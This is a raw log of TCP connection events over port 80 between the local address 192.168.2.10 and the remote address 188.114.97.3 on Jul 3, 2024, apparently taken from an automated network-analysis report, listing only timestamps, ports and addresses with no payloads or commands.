                                                    Jul 3, 2024 16:43:15.866590977 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.916448116 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.950858116 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.994597912 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.079298973 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.119493961 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.224643946 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.276041031 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.380975008 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.381298065 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.386280060 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.386360884 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.386389017 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.386434078 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.386534929 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.391360998 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.574249983 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.574368954 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.579257011 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.579408884 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.579525948 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.584778070 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.622819901 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.703396082 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.708358049 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.708429098 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.708558083 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.713347912 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.756236076 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.756282091 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.932291031 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.937736988 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.938119888 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.046717882 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.057207108 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.062311888 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.088227034 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.088772058 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.093763113 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.174099922 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.183898926 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.184073925 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.189090014 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.189136982 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.228858948 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.386924982 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.420027018 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.432029009 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.463236094 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.510787964 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.514166117 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.519059896 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.521200895 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.572597980 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.612626076 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.612823009 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.618052006 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.912786007 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.969162941 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.057023048 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.103867054 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.181857109 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.181857109 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.182740927 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.188245058 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.188334942 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.188347101 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.188472033 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.188649893 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.188704014 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.189326048 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.195187092 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.526547909 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.531414032 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.541557074 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.546458006 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.222923994 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.390216112 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.392888069 CEST4978780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.393177032 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.575375080 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.583831072 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.670202971 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.713340044 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.878946066 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.931997061 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.013571978 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.014708996 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.019375086 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.019438028 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.019674063 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.019750118 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.020035028 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.024849892 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.369653940 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.374690056 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.489301920 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.543742895 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.667859077 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.721709967 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.852328062 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.853308916 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.857573986 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.857688904 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.858108044 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.858181953 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.858467102 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.863225937 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.213408947 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.218396902 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.313642025 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.369494915 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.642043114 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.697644949 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.803044081 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.803379059 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.808432102 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.808500051 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.808557987 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.808583975 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.808743000 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.813534021 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.166680098 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.168098927 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.168642998 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.172631025 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.173683882 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.173782110 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.182308912 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.182374001 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.198561907 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.203546047 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.413301945 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.418466091 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.422492981 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.422549009 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.427742958 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.557533026 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.562823057 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.562841892 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.635180950 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.682015896 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.741929054 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.747035027 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.748447895 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.748697996 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.753612041 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.776151896 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.781898022 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.873919010 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.916383028 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.978106976 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.025775909 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.111377001 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.116425037 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.221559048 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.223052025 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.275736094 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.275866985 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.353744984 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.356633902 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.357830048 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.359009027 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.359056950 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.361845016 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.361896038 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.362730980 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.362802982 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.362921000 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.367692947 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.641561985 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.641581059 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.641633987 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.669821024 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.679934025 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.713529110 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.718462944 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.773369074 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.773624897 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.778450012 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.784931898 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.789825916 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.789894104 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.789969921 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.794861078 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.836013079 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.885107994 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.067106962 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.067126036 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.067203045 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.104398012 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.109318972 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.136384964 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.142117977 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.166126966 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.202522993 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.202711105 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.207683086 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.207748890 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.213315010 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.248568058 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.290169954 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.291626930 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.295085907 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.295356035 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.295356035 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.300206900 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.458760023 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.486654043 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.510380983 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.541570902 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.654476881 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.659421921 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.750652075 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.791395903 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.085961103 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.135121107 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.241735935 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.246052027 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.246892929 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.246943951 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.250832081 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.250911951 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.253112078 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.257884979 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.510761976 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.515656948 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.604202986 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.608999968 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.609117985 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.609241009 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.614111900 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.614154100 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.692255020 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.744503975 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.933255911 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.978864908 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.024578094 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.072614908 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.147578955 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.148430109 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.152919054 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.152972937 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.153306961 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.153374910 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.153502941 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.158298969 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.510221958 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.515254021 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.644229889 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.697633982 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.948298931 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.953299999 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.977206945 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.025755882 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.047184944 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.047343016 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.056618929 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.059926987 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.100864887 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.101552010 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.106374025 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.106430054 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.108524084 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.108591080 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.108735085 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.114387989 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.381081104 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.431994915 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.463613033 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.468537092 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.571706057 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.619510889 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.917397976 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.963243008 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.995628119 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.996651888 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.000864029 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.000916004 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.001450062 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.001499891 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.001620054 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.006494045 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.036386967 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.039889097 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.043107986 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.047991037 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.048309088 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.048408985 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.053438902 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.086604118 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.363316059 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.363380909 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.385736942 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.390594006 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.400813103 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.405678034 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.484080076 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.484278917 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.489165068 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.489234924 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.493532896 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.541372061 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.699007988 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.744503975 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.785795927 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.818722963 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.838248014 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.869502068 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.915795088 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.917382956 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.197731018 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.397219896 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.403357983 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.408634901 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.412689924 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.532396078 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.537734985 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.540582895 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.540582895 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.545531034 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.886837006 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.936311960 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.028476000 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.090536118 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:55.104429007 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:55.109349966 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.202750921 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.202928066 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:55.207798004 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.207973957 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.541383028 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.588287115 CEST4983080192.168.2.10188.114.97.3
